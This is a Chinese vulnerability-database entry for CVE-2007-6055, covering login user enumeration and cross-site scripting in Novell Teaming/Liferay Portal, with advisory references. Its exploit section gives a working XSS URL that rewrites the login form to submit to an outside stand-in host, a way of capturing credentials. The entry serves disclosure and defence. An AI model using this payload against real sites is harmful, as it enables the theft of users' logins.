Novell Teaming用户枚举和跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113946 漏洞类型 跨站脚本
发布时间 2007-11-16 更新时间 2009-04-23
CVE编号 CVE-2007-6055 CNNVD-ID CNNVD-200711-294
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30774
https://cxsecurity.com/issue/WLB-2007110054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-294
|漏洞详情
NovellTeaming是专为团队协同作业而设计的解决方案,内含各种企业社区网络与工作流程功能。NovellTeaming通过以下登录表单执行用户认证:https://teaming.example.com/c/portal/login对于有效的和无效的用户名,Web应用会返回不同的响应(Pleaseenteravalidlogin/Auhtenticationfailed),这就允许攻击者通过字典或暴力猜测攻击推测出是否存在特定的用户名。NovellTeaming没有正确地验证或转义p_p_state和p_p_mode参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/26470/info

Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Liferay Portal 4.1.0 and 4.1.1 are vulnerable; other versions may also be affected.

http://www.example.com/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http://www.example2.com%22%3C/script%3E%3Ca%20b=%22c
|参考资料

来源:VUPEN
名称:ADV-2009-1048
链接:http://www.vupen.com/english/advisories/2009/1048
来源:SECTRACK
名称:1022063
链接:http://www.securitytracker.com/id?1022063
来源:BUGTRAQ
名称:20071115PR07-02:XSSonLiferayPortalEnterprise4.1.1loginpage('login'parameter)
链接:http://www.securityfocus.com/archive/1/archive/1/483777/100/0/threaded
来源:MISC
链接:http://www.procheckup.com/Vulnerability_PR07-02.php
来源:SECUNIA
名称:34714
链接:http://secunia.com/advisories/34714
来源:OSVDB
名称:38702
链接:http://osvdb.org/38702
来源:XF
名称:liferay-portal-login-xss(38503)
链接:http://xforce.iss.net/xforce/xfdb/38503
来源:BID
名称:26470
链接:http://www.securityfocus.com/bid/26470
来源:SREASON
名称:3379
链接:http://securityreason.com/securityalert/3379
来源:SECUNIA
名称:27537
链接:http://secunia.com/advisories/27537